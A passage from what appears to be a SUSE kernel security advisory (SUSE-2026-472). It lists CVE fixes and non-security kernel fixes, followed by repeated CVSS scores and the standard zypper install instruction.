- CVE-2025-68320: lan966x: Fix sleeping in atomic context (bsc#1255172).
- CVE-2025-68325: net/sched: sch_cake: Fix incorrect qlen reduction in cake_drop (bsc#1255417).
- CVE-2025-68327: usb: renesas_usbhs: Fix synchronous external abort on unbind (bsc#1255488).
- CVE-2025-68337: jbd2: avoid bug_on in jbd2_journal_get_create_access() when file system corrupted (bsc#1255482).
- CVE-2025-68349: NFSv4/pNFS: Clear NFS_INO_LAYOUTCOMMIT in pnfs_mark_layout_stateid_invalid (bsc#1255544).
- CVE-2025-68363: bpf: Check skb->transport_header is set in bpf_skb_check_mtu (bsc#1255552).
- CVE-2025-68365: fs/ntfs3: Initialize allocated memory before use (bsc#1255548).
- CVE-2025-68366: nbd: defer config unlock in nbd_genl_connect (bsc#1255622).
- CVE-2025-68367: macintosh/mac_hid: fix race condition in mac_hid_toggle_emumouse (bsc#1255547).
- CVE-2025-68372: nbd: defer config put in recv_work (bsc#1255537).
- CVE-2025-68379: RDMA/rxe: Fix null deref on srq->rq.queue after resize failure (bsc#1255695).
- CVE-2025-68727: ntfs3: Fix uninit buffer allocated by __getname() (bsc#1255568).
- CVE-2025-68728: ntfs3: fix uninit memory after failed mi_read in mi_format_new (bsc#1255539).
- CVE-2025-68733: smack: fix bug: unprivileged task can create labels (bsc#1255615).
- CVE-2025-68764: NFS: Automounted filesystems should inherit ro,noexec,nodev,sync flags (bsc#1255930).
- CVE-2025-68768: inet: frags: add inet_frag_queue_flush() (bsc#1256579).
- CVE-2025-68770: bnxt_en: Fix XDP_TX path (bsc#1256584).
- CVE-2025-68771: ocfs2: fix kernel BUG in ocfs2_find_victim_chain (bsc#1256582).
- CVE-2025-68775: net/handshake: duplicate handshake cancellations leak socket (bsc#1256665).
- CVE-2025-68776: net/hsr: fix NULL pointer dereference in prp_get_untagged_frame() (bsc#1256659).
- CVE-2025-68788: fsnotify: do not generate ACCESS/MODIFY events on child for special files (bsc#1256638).
- CVE-2025-68795: ethtool: Avoid overflowing userspace buffer on stats query (bsc#1256688).
- CVE-2025-68798: perf/x86/amd: Check event before enable to avoid GPF (bsc#1256689).
- CVE-2025-68800: mlxsw: spectrum_mr: Fix use-after-free when updating multicast route stats (bsc#1256646).
- CVE-2025-68801: mlxsw: spectrum_router: Fix neighbour use-after-free (bsc#1256653).
- CVE-2025-68803: nfsd: set security label during create operations (bsc#1256770).
- CVE-2025-68813: ipvs: fix ipv4 null-ptr-deref in route error path (bsc#1256641).
- CVE-2025-68814: io_uring: fix filename leak in __io_openat_prep() (bsc#1256651).
- CVE-2025-68815: net/sched: ets: Remove drr class from the active list if it changes to strict (bsc#1256680).
- CVE-2025-68816: net/mlx5: fw_tracer, Validate format string parameters (bsc#1256674).
- CVE-2025-68820: ext4: xattr: fix null pointer deref in ext4_raw_inode() (bsc#1256754).
- CVE-2025-71064: net: hns3: using the num_tqps in the vf driver to apply for resources (bsc#1256654).
- CVE-2025-71066: net/sched: ets: Always remove class from active list before deleting in ets_qdisc_change (bsc#1256645).
- CVE-2025-71077: tpm: Cap the number of PCR banks (bsc#1256613).
- CVE-2025-71080: ipv6: fix a BUG in rt6_get_pcpu_route() under PREEMPT_RT (bsc#1256608).
- CVE-2025-71084: RDMA/cm: Fix leaking the multicast GID table reference (bsc#1256622).
- CVE-2025-71085: ipv6: BUG() in pskb_expand_head() as part of calipso_skbuff_setattr() (bsc#1256623).
- CVE-2025-71087: iavf: fix off-by-one issues in iavf_config_rss_reg() (bsc#1256628).
- CVE-2025-71088: mptcp: fallback earlier on simult connection (bsc#1256630).
- CVE-2025-71089: iommu: disable SVA when CONFIG_X86 is set (bsc#1256612).
- CVE-2025-71091: team: fix check for port enabled in team_queue_override_port_prio_changed() (bsc#1256773).
- CVE-2025-71093: e1000: fix OOB in e1000_tbi_should_accept() (bsc#1256777).
- CVE-2025-71094: net: usb: asix: ax88772: Increase phy_name size (bsc#1256597).
- CVE-2025-71095: net: stmmac: fix the crash issue for zero copy XDP_TX action (bsc#1256605).
- CVE-2025-71096: RDMA/core: Check for the presence of LS_NLA_TYPE_DGID correctly (bsc#1256606).
- CVE-2025-71097: ipv4: Fix reference count leak when using error routes with nexthop objects (bsc#1256607).
- CVE-2025-71098: ip6_gre: make ip6gre_header() robust (bsc#1256591).
- CVE-2025-71112: net: hns3: add VLAN id validation before using (bsc#1256726).
- CVE-2025-71116: libceph: make decode_pool() more resilient against corrupted osdmaps (bsc#1256744).
- CVE-2025-71120: SUNRPC: svcauth_gss: avoid NULL deref on zero length gss_token in gss_read_proxy_verf (bsc#1256779).
- CVE-2025-71123: ext4: fix string copying in parse_apply_sb_mount_options() (bsc#1256757).
- CVE-2025-71133: RDMA/irdma: avoid invalid read in irdma_net_event (bsc#1256733).
- CVE-2025-71135: md/raid5: fix possible null-pointer dereferences in raid5_store_group_thread_cnt() (bsc#1256761).
- CVE-2025-71137: octeontx2-pf: fix 'UBSAN: shift-out-of-bounds error' (bsc#1256760).
- CVE-2025-71149: io_uring/poll: correctly handle io_poll_add() return value on update (bsc#1257164).
- CVE-2025-71156: gve: defer interrupt enabling until NAPI registration (bsc#1257167).
- CVE-2025-71157: RDMA/core: always drop device refcount in ib_del_sub_device_and_put() (bsc#1257168).
- CVE-2026-22976: net/sched: sch_qfq: Fix NULL deref when deactivating inactive aggregate in qfq_reset (bsc#1257035).
- CVE-2026-22977: net: sock: fix hardened usercopy panic in sock_recv_errqueue (bsc#1257053).
- CVE-2026-22984: libceph: prevent potential out-of-bounds reads in handle_auth_done() (bsc#1257217).
- CVE-2026-22990: libceph: replace overzealous BUG_ON in osdmap_apply_incremental() (bsc#1257221).
- CVE-2026-22991: libceph: make free_choose_arg_map() resilient to partial allocation (bsc#1257220).
- CVE-2026-22992: libceph: return the handler error from mon_handle_auth_done() (bsc#1257218).
- CVE-2026-22993: idpf: Fix RSS LUT NULL pointer crash on early ethtool operations (bsc#1257180).
- CVE-2026-22996: net/mlx5e: Don't store mlx5e_priv in mlx5e_dev devlink priv.
- CVE-2026-22999: net/sched: sch_qfq: do not free existing class in qfq_change_class() (bsc#1257236).
- CVE-2026-23000: net/mlx5e: Fix crash on profile change rollback failure (bsc#1257234).
- CVE-2026-23001: macvlan: fix possible UAF in macvlan_forward_source() (bsc#1257232).
- CVE-2026-23005: x86/fpu: Clear XSTATE_BV in guest XSAVE state whenever XFD[i]=1 (bsc#1257245).
- CVE-2026-23010: ipv6: Fix use-after-free in inet6_addr_del() (bsc#1257332).
- CVE-2026-23011: ipv4: ip_gre: make ipgre_header() robust (bsc#1257207).
The following non security issues were fixed:
- ALSA: ctxfi: Fix potential OOB access in audio mixer handling (stable-fixes).
- ALSA: scarlett2: Fix buffer overflow in config retrieval (git-fixes).
- ALSA: usb-audio: Fix use-after-free in snd_usb_mixer_free() (git-fixes).
- ALSA: usb-audio: Update for native DSD support quirks (stable-fixes).
- ALSA: usb: Increase volume range that triggers a warning (git-fixes).
- ASoC: amd: yc: Add quirk for Honor MagicBook X16 2025 (stable-fixes).
- ASoC: codecs: wsa881x: Drop unused version readout (stable-fixes).
- ASoC: codecs: wsa881x: fix unnecessary initialisation (git-fixes).
- ASoC: codecs: wsa883x: fix unnecessary initialisation (git-fixes).
- ASoC: codecs: wsa884x: fix codec initialisation (git-fixes).
- ASoC: fsl_sai: Add missing registers to cache default (stable-fixes).
- ASoC: fsl: imx-card: Do not force slot width to sample width (git-fixes).
- ASoC: Intel: sof_es8336: fix headphone GPIO logic inversion (git-fixes).
- ASoC: tlv320adcx140: fix null pointer (git-fixes).
- ASoC: tlv320adcx140: fix word length (git-fixes).
- ata: libata: Add cpr_log to ata_dev_print_features() early return (git-fixes).
- Bluetooth: hci_uart: fix null-ptr-deref in hci_uart_write_work (git-fixes).
- Bluetooth: MGMT: Fix memory leak in set_ssp_complete (git-fixes).
- bpf: Do not let BPF test infra emit invalid GSO types to stack (bsc#1255569).
- bpf/selftests: test_select_reuseport_kern: Remove unused header (bsc#1257603).
- bs-upload-kernel: Fix cve branch uploads.
- btrfs: do not strictly require dirty metadata threshold for metadata writepages (stable-fixes).
- can: ctucanfd: fix SSP_SRC in cases when bit-rate is higher than 1 MBit (git-fixes).
- can: ems_usb: ems_usb_read_bulk_callback(): fix URB memory leak (git-fixes).
- can: etas_es58x: allow partial RX URB allocation to succeed (git-fixes).
- can: gs_usb: gs_usb_receive_bulk_callback(): fix error message (git-fixes).
- can: gs_usb: gs_usb_receive_bulk_callback(): unanchor URL on usb_submit_urb() error (git-fixes).
- can: j1939: make j1939_session_activate() fail if device is no longer registered (stable-fixes).
- can: kvaser_usb: kvaser_usb_read_bulk_callback(): fix URB memory leak (git-fixes).
- can: mcba_usb: mcba_usb_read_bulk_callback(): fix URB memory leak (git-fixes).
- can: usb_8dev: usb_8dev_read_bulk_callback(): fix URB memory leak (git-fixes).
- cifs: add new field to track the last access time of cfid (git-fixes).
- cifs: after disabling multichannel, mark tcon for reconnect (git-fixes).
- cifs: avoid redundant calls to disable multichannel (git-fixes).
- cifs: cifs_pick_channel should try selecting active channels (git-fixes).
- cifs: deal with the channel loading lag while picking channels (git-fixes).
- cifs: dns resolution is needed only for primary channel (git-fixes).
- cifs: do not disable interface polling on failure (git-fixes).
- cifs: do not search for channel if server is terminating (git-fixes).
- cifs: fix a pending undercount of srv_count (git-fixes).
- cifs: Fix copy offload to flush destination region (bsc#1252511).
- cifs: Fix flushing, invalidation and file size with copy_file_range() (bsc#1252511).
- cifs: fix lock ordering while disabling multichannel (git-fixes).
- cifs: fix stray unlock in cifs_chan_skip_or_disable (git-fixes).
- cifs: fix use after free for iface while disabling secondary channels (git-fixes).
- cifs: handle servers that still advertise multichannel after disabling (git-fixes).
- cifs: handle when server starts supporting multichannel (git-fixes).
- cifs: handle when server stops supporting multichannel (git-fixes).
- cifs: make cifs_chan_update_iface() a void function (git-fixes).
- cifs: make sure server interfaces are requested only for SMB3+ (git-fixes).
- cifs: make sure that channel scaling is done only once (git-fixes).
- cifs: reconnect worker should take reference on server struct unconditionally (git-fixes).
- cifs: reset connections for all channels when reconnect requested (git-fixes).
- cifs: reset iface weights when we cannot find a candidate (git-fixes).
- cifs: serialize other channels when query server interfaces is pending (git-fixes).
- cifs: update dstaddr whenever channel iface is updated (git-fixes).
- comedi: dmm32at: serialize use of paged registers (git-fixes).
- comedi: fix divide-by-zero in comedi_buf_munge() (stable-fixes).
- comedi: Fix getting range information for subdevices 16 to 255 (git-fixes).
- cpuset: fix warning when disabling remote partition (bsc#1256794).
- crypto: authencesn - reject too-short AAD (assoclen<8) to match ESP/ESN spec (git-fixes).
- dmaengine: apple-admac: Add 'apple,t8103-admac' compatible (git-fixes).
- dmaengine: at_hdmac: fix device leak on of_dma_xlate() (git-fixes).
- dmaengine: bcm-sba-raid: fix device leak on probe (git-fixes).
- dmaengine: dw: dmamux: fix OF node leak on route allocation failure (git-fixes).
- dmaengine: idxd: fix device leaks on compat bind and unbind (git-fixes).
- dmaengine: lpc18xx-dmamux: fix device leak on route allocation (git-fixes).
- dmaengine: omap-dma: fix dma_pool resource leak in error paths (git-fixes).
- dmaengine: qcom: gpi: Fix memory leak in gpi_peripheral_config() (git-fixes).
- dmaengine: sh: rz-dmac: Fix rz_dmac_terminate_all() (git-fixes).
- dmaengine: tegra-adma: Fix use-after-free (git-fixes).
- dmaengine: ti: dma-crossbar: fix device leak on am335x route allocation (git-fixes).
- dmaengine: ti: dma-crossbar: fix device leak on dra7x route allocation (git-fixes).
- dmaengine: ti: k3-udma: fix device leak on udma lookup (git-fixes).
- dmaengine: xilinx_dma: Fix uninitialized addr_width when 'xlnx,addrwidth' property is missing (git-fixes).
- dmaengine: xilinx: xdma: Fix regmap max_register (git-fixes).
- dpll: fix device-id-get and pin-id-get to return errors properly (git-fixes).
- dpll: fix return value check for kmemdup (git-fixes).
- dpll: indent DPLL option type by a tab (git-fixes).
- dpll: Prevent duplicate registrations (git-fixes).
- dpll: spec: add missing module-name and clock-id to pin-get reply (git-fixes).
- drm/amd: Clean up kfd node on surprise disconnect (stable-fixes).
- drm/amd/display: Apply e4479aecf658 to dml (stable-fixes).
- drm/amd/display: Bump the HDMI clock to 340MHz (stable-fixes).
- drm/amd/display: Fix DP no audio issue (stable-fixes).
- drm/amd/display: Initialise backlight level values from hw (git-fixes).
- drm/amd/display: Respect user's CONFIG_FRAME_WARN more for dml files (stable-fixes).
- drm/amd/display: shrink struct members (stable-fixes).
- drm/amd/pm: Don't clear SI SMC table when setting power limit (git-fixes).
- drm/amd/pm: fix race in power state check before mutex lock (git-fixes).
- drm/amd/pm: fix smu overdrive data type wrong issue on smu 14.0.2 (git-fixes).
- drm/amd/pm: Workaround SI powertune issue on Radeon 430 (v2) (git-fixes).
- drm/amdgpu: Fix cond_exec handling in amdgpu_ib_schedule() (git-fixes).
- drm/amdgpu: fix NULL pointer dereference in amdgpu_gmc_filter_faults_remove (git-fixes).
- drm/amdgpu: Fix query for VPE block_type and ip_count (stable-fixes).
- drm/amdgpu: remove frame cntl for gfx v12 (stable-fixes).
- drm/amdkfd: fix a memory leak in device_queue_manager_init() (git-fixes).
- drm/amdkfd: Fix improper NULL termination of queue restore SMI event string (stable-fixes).
- drm/imagination: Wait for FW trace update command completion (git-fixes).
- drm/imx/tve: fix probe device leak (git-fixes).
- drm/msm/a6xx: fix bogus hwcg register updates (git-fixes).
- drm/nouveau: add missing DCB connector types (git-fixes).
- drm/nouveau: implement missing DCB connector types; gracefully handle unknown connectors (git-fixes).
- drm/nouveau/disp: Set drm_mode_config_funcs.atomic_(check|commit) (stable-fixes).
- drm/nouveau/disp/nv50-: Set lock_core in curs507a_prepare (git-fixes).
- drm/panel-simple: fix connector type for DataImage SCF0700C48GGU18 panel (git-fixes).
- drm/radeon: Remove __counted_by from ClockInfoArray.clockInfo[] (stable-fixes).
- drm/vmwgfx: Fix an error return check in vmw_compat_shader_add() (git-fixes).
- drm/vmwgfx: Merge vmw_bo_release and vmw_bo_free functions (git-fixes).
- exfat: check return value of sb_min_blocksize in exfat_read_boot_sector (git-fixes).
- exfat: fix remount failure in different process environments (git-fixes).
- gpio: omap: do not register driver in probe() (git-fixes).
- gpio: pca953x: Add support for level-triggered interrupts (stable-fixes).
- gpio: pca953x: fix wrong error probe return value (git-fixes).
- gpio: pca953x: handle short interrupt pulses on PCAL devices (git-fixes).
- gpio: pca953x: Utilise dev_err_probe() where it makes sense (stable-fixes).
- gpio: pca953x: Utilise temporary variable for struct device (stable-fixes).
- gpio: rockchip: Stop calling pinctrl for set_direction (git-fixes).
- HID: usbhid: paper over wrong bNumDescriptor field (stable-fixes).
- ice: use netif_get_num_default_rss_queues() (bsc#1247712).
- iio: accel: iis328dq: fix gain values (git-fixes).
- iio: adc: ad7280a: handle spi_setup() errors in probe() (git-fixes).
- iio: adc: ad9467: fix ad9434 vref mask (git-fixes).
- iio: adc: at91-sama5d2_adc: Fix potential use-after-free in sama5d2_adc driver (git-fixes).
- iio: dac: ad5686: add AD5695R to ad5686_chip_info_tbl (git-fixes).
- iio: imu: st_lsm6dsx: fix iio_chan_spec for sensors without event detection (git-fixes).
- Input: i8042 - add quirk for ASUS Zenbook UX425QA_UM425QA (stable-fixes).
- Input: i8042 - add quirks for MECHREVO Wujie 15X Pro (stable-fixes).
- intel_th: fix device leak on output open() (git-fixes).
- leds: led-class: Only Add LED to leds_list when it is fully ready (git-fixes).
- lib/crypto: aes: Fix missing MMU protection for AES S-box (git-fixes).
- mei: me: add nova lake point S DID (stable-fixes).
- mei: me: add wildcat lake P DID (stable-fixes).
- mISDN: annotate data-race around dev->work (git-fixes).
- mm, page_alloc, thp: prevent reclaim for __GFP_THISNODE THP allocations (bsc#1253087).
- mmc: rtsx_pci_sdmmc: implement sdmmc_card_busy function (git-fixes).
- mmc: sdhci-of-dwcmshc: Prevent illegal clock reduction in HS200/HS400 mode (git-fixes).
- net: can: j1939: j1939_xtp_rx_rts_session_active(): deactivate session upon receiving the second rts (git-fixes).
- net: hv_netvsc: reject RSS hash key programming without RX indirection table (bsc#1257473).
- net: mana: Add metadata support for xdp mode (git-fixes).
- net: mana: Add standard counter rx_missed_errors (git-fixes).
- net: mana: Add support for auxiliary device servicing events (git-fixes).
- net: mana: Change the function signature of mana_get_primary_netdev_rcu (bsc#1256690).
- net: mana: Drop TX skb on post_work_request failure and unmap resources (git-fixes).
- net: mana: fix spelling for mana_gd_deregiser_irq() (git-fixes).
- net: mana: Fix use-after-free in reset service rescan path (git-fixes).
- net: mana: Fix warnings for missing export.h header inclusion (git-fixes).
- net: mana: Handle hardware recovery events when probing the device (git-fixes).
- net: mana: Handle Reset Request from MANA NIC (git-fixes).
- net: mana: Handle SKB if TX SGEs exceed hardware limit (git-fixes).
- net: mana: Handle unsupported HWC commands (git-fixes).
- net: mana: Move hardware counter stats from per-port to per-VF context (git-fixes).
- net: mana: Probe rdma device in mana driver (git-fixes).
- net: mana: Reduce waiting time if HWC not responding (git-fixes).
- net: tcp: allow zero-window ACK update the window (bsc#1254767).
- net: usb: dm9601: remove broken SR9700 support (git-fixes).
- net: wwan: t7xx: fix potential skb->frags overflow in RX path (git-fixes).
- nfc: llcp: Fix memleak in nfc_llcp_send_ui_frame() (git-fixes).
- nfc: nci: Fix race between rfkill and nci_unregister_device() (git-fixes).
- NFS: Fix up the automount fs_context to use the correct cred (git-fixes).
- nfsd: Drop the client reference in client_states_open() (git-fixes).
- NFSD: Fix permission check for read access to executable-only files (git-fixes).
- NFSD: use correct reservation type in nfsd4_scsi_fence_client (git-fixes).
- NFSD/blocklayout: Fix minlength check in proc_layoutget (git-fixes).
- NFSv4: ensure the open stateid seqid doesn't go backwards (git-fixes).
- nvme: nvme-fc: move tagset removal to nvme_fc_delete_ctrl() (git-fixes).
- nvmet-auth: update sc_c in host response (git-fixes).
- nvmet-auth: update sc_c in target host hash calculation (git-fixes).
- of: fix reference count leak in of_alias_scan() (git-fixes).
- of: platform: Use default match table for /firmware (git-fixes).
- phy: freescale: imx8m-pcie: assert phy reset during power on (stable-fixes).
- phy: rockchip: inno-usb2: fix communication disruption in gadget mode (git-fixes).
- phy: rockchip: inno-usb2: fix disconnection in gadget mode (git-fixes).
- phy: stm32-usphyc: Fix off by one in probe() (git-fixes).
- phy: tegra: xusb: Explicitly configure HS_DISCON_LEVEL to 0x7 (git-fixes).
- platform/x86: hp-bioscfg: Fix automatic module loading (git-fixes).
- platform/x86: hp-bioscfg: Fix kernel panic in GET_INSTANCE_ID macro (git-fixes).
- platform/x86: hp-bioscfg: Fix kobject warnings for empty attribute names (git-fixes).
- platform/x86/amd: Fix memory leak in wbrf_record() (git-fixes).
- pnfs/flexfiles: Fix memory leak in nfs4_ff_alloc_deviceid_node() (git-fixes).
- powercap: fix race condition in register_control_type() (stable-fixes).
- powercap: fix sscanf() error return value handling (stable-fixes).
- powerpc/addnote: Fix overflow on 32-bit builds (bsc#1215199).
- RDMA/mana_ib: Access remote atomic for MRs (git-fixes).
- RDMA/mana_ib: add additional port counters (git-fixes).
- RDMA/mana_ib: Add device statistics support (git-fixes).
- RDMA/mana_ib: Add port statistics support (git-fixes).
- RDMA/mana_ib: Add support of 4M, 1G, and 2G pages (git-fixes).
- RDMA/mana_ib: Add support of mana_ib for RNIC and ETH nic (git-fixes).
- RDMA/mana_ib: add support of multiple ports (git-fixes).
- RDMA/mana_ib: Allow registration of DMA-mapped memory in PDs (git-fixes).
- RDMA/mana_ib: check cqe length for kernel CQs (git-fixes).
- RDMA/mana_ib: Create and destroy UD/GSI QP (git-fixes).
- RDMA/mana_ib: create kernel-level CQs (git-fixes).
- RDMA/mana_ib: create/destroy AH (git-fixes).
- RDMA/mana_ib: Drain send wrs of GSI QP (git-fixes).
- RDMA/mana_ib: extend mana QP table (git-fixes).
- RDMA/mana_ib: Extend modify QP (git-fixes).
- RDMA/mana_ib: Fix error code in probe() (git-fixes).
- RDMA/mana_ib: Fix integer overflow during queue creation (git-fixes).
- RDMA/mana_ib: Handle net event for pointing to the current netdev (bsc#1256690).
- RDMA/mana_ib: helpers to allocate kernel queues (git-fixes).
- RDMA/mana_ib: Implement DMABUF MR support (git-fixes).
- RDMA/mana_ib: implement get_dma_mr (git-fixes).
- RDMA/mana_ib: implement req_notify_cq (git-fixes).
- RDMA/mana_ib: indicate CM support (git-fixes).
- RDMA/mana_ib: polling of CQs for GSI/UD (git-fixes).
- RDMA/mana_ib: Query feature_flags bitmask from FW (git-fixes).
- RDMA/mana_ib: request error CQEs when supported (git-fixes).
- RDMA/mana_ib: support of the zero based MRs (git-fixes).
- RDMA/mana_ib: UD/GSI QP creation for kernel (git-fixes).
- RDMA/mana_ib: UD/GSI work requests (git-fixes).
- RDMA/mana_ib: unify mana_ib functions to support any gdma device (git-fixes).
- RDMA/mana_ib: Use safer allocation function() (git-fixes).
- regmap: Fix race condition in hwspinlock irqsave routine (git-fixes).
- sched: Increase sched_tick_remote timeout (bsc#1254510).
- sched/rt: Skip group schedulable check with rt_group_sched=0 (bsc#1256568).
- scsi: lpfc: Rework lpfc_sli4_fcf_rr_next_index_get() (bsc#1256861).
- scsi: lpfc: Update lpfc version to 14.4.0.13 (bsc#1256861).
- scsi: qla2xxx: Add bsg interface to support firmware img validation (bsc#1256863).
- scsi: qla2xxx: Add load flash firmware mailbox support for 28xxx (bsc#1256863).
- scsi: qla2xxx: Add Speed in SFP print information (bsc#1256863).
- scsi: qla2xxx: Add support for 64G SFP speed (bsc#1256863).
- scsi: qla2xxx: Allow recovery for tape devices (bsc#1256863).
- scsi: qla2xxx: Delay module unload while fabric scan in progress (bsc#1256863).
- scsi: qla2xxx: Fix bsg_done() causing double free (bsc#1256863).
- scsi: qla2xxx: Free sp in error path to fix system crash (bsc#1256863).
- scsi: qla2xxx: Query FW again before proceeding with login (bsc#1256863).
- scsi: qla2xxx: Update version to 10.02.10.100-k (bsc#1256863).
- scsi: qla2xxx: Validate MCU signature before executing MBC 03h (bsc#1256863).
- scsi: qla2xxx: Validate sp before freeing associated memory (bsc#1256863).
- scsi: storvsc: Process unsupported MODE_SENSE_10 (bsc#1257296).
- selftests: net: fib-onlink-tests: Convert to use namespaces by default (bsc#1255346).
- selftests/bpf: Fix flaky bpf_cookie selftest (git-fixes).
- serial: 8250_pci: Fix broken RS485 for F81504/508/512 (git-fixes).
- slimbus: core: fix device reference leak on report present (git-fixes).
- slimbus: core: fix OF node leak on registration failure (git-fixes).
- slimbus: core: fix of_slim_get_device() kernel doc (git-fixes).
- slimbus: core: fix runtime PM imbalance on report present (git-fixes).
- smb: change return type of cached_dir_lease_break() to bool (git-fixes).
- smb: client: ensure open_cached_dir_by_dentry() only returns valid cfid (git-fixes).
- smb: client: fix cifs_pick_channel when channel needs reconnect (git-fixes).
- smb: client: fix warning when reconnecting channel (git-fixes).
- smb: client: introduce close_cached_dir_locked() (git-fixes).
- smb: client: remove unused fid_lock (git-fixes).
- smb: client: short-circuit in open_cached_dir_by_dentry() if !dentry (git-fixes).
- smb: client: split cached_fid bitfields to avoid shared-byte RMW races (bsc#1250748).
- smb: client: update cfid->last_access_time in open_cached_dir_by_dentry() (git-fixes).
- smb: improve directory cache reuse for readdir operations (bsc#1252712).
- smb3: add missing null server pointer check (git-fixes).
- spi: spi-sprd-adi: Fix double free in probe error path (git-fixes).
- spi: sprd-adi: switch to use spi_alloc_host() (stable-fixes).
- spi: sprd: adi: Use devm_register_restart_handler() (stable-fixes).
- svcrdma: return 0 on success from svc_rdma_copy_inline_range (git-fixes).
- uacce: ensure safe queue release with state management (git-fixes).
- uacce: fix cdev handling in the cleanup path (git-fixes).
- uacce: fix isolate sysfs check condition (git-fixes).
- uacce: implement mremap in uacce_vm_ops to return -EPERM (git-fixes).
- usb: core: add USB_QUIRK_NO_BOS for devices that hang on BOS descriptor (stable-fixes).
- usb: dwc3: Check for USB4 IP_NAME (stable-fixes).
- USB: OHCI/UHCI: Add soft dependencies on ehci_platform (stable-fixes).
- USB: serial: ftdi_sio: add support for PICAXE AXE027 cable (stable-fixes).
- USB: serial: option: add Telit LE910 MBIM composition (stable-fixes).
- usbnet: limit max_mtu based on device's hard_mtu (git-fixes).
- w1: fix redundant counter decrement in w1_attach_slave_device() (git-fixes).
- w1: therm: Fix off-by-one buffer overflow in alarms_store (git-fixes).
- wifi: ath10k: fix dma_free_coherent() pointer (git-fixes).
- wifi: ath12k: fix dma_free_coherent() pointer (git-fixes).
- wifi: mac80211: correctly decode TTLM with default link map (git-fixes).
- wifi: mac80211: don't perform DA check on S1G beacon (git-fixes).
- wifi: mwifiex: Fix a loop in mwifiex_update_ampdu_rxwinsize() (git-fixes).
- wifi: rsi: Fix memory corruption due to not set vif driver data size (git-fixes).
- x86: make page fault handling disable interrupts properly (git-fixes).
- x86/microcode: Fix Entrysign revision check for Zen1/Naples (bsc#1256528).
- x86/microcode/AMD: Add more known models to entry sign checking (bsc#1256528).
- x86/microcode/AMD: Add some forgotten models to the SHA check (bsc#1256528).
- x86/microcode/AMD: Add TSA microcode SHAs (bsc#1256528).
- x86/microcode/AMD: Add Zen5 model 0x44, stepping 0x1 minrev (bsc#1256528).
- x86/microcode/AMD: Clean the cache if update did not load microcode (bsc#1256528).
- x86/microcode/AMD: Extend the SHA check to Zen5, block loading of any unreleased standalone Zen5 microcode patches (bsc#1256528).
- x86/microcode/AMD: Fix __apply_microcode_amd()'s return value (bsc#1256528).
- x86/microcode/AMD: Fix Entrysign revision check for Zen5/Strix Halo (bsc#1256528).
- x86/microcode/AMD: Limit Entrysign signature checking to known generations (bsc#1256528).
- x86/microcode/AMD: Load only SHA256-checksummed patches (bsc#1256528).
- x86/microcode/AMD: Use sha256() instead of init/update/final (bsc#1256528).
Patchnames: SUSE-2026-472,SUSE-SLE-Module-Public-Cloud-15-SP7-2026-472
Terms of use: CSAF 2.0 data is provided by SUSE under the Creative Commons License 4.0 with Attribution (CC-BY-4.0).
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
4.7 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
6.1 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
6.6 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
6.1 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.3 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
4.4 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
4.7 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
6.3 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
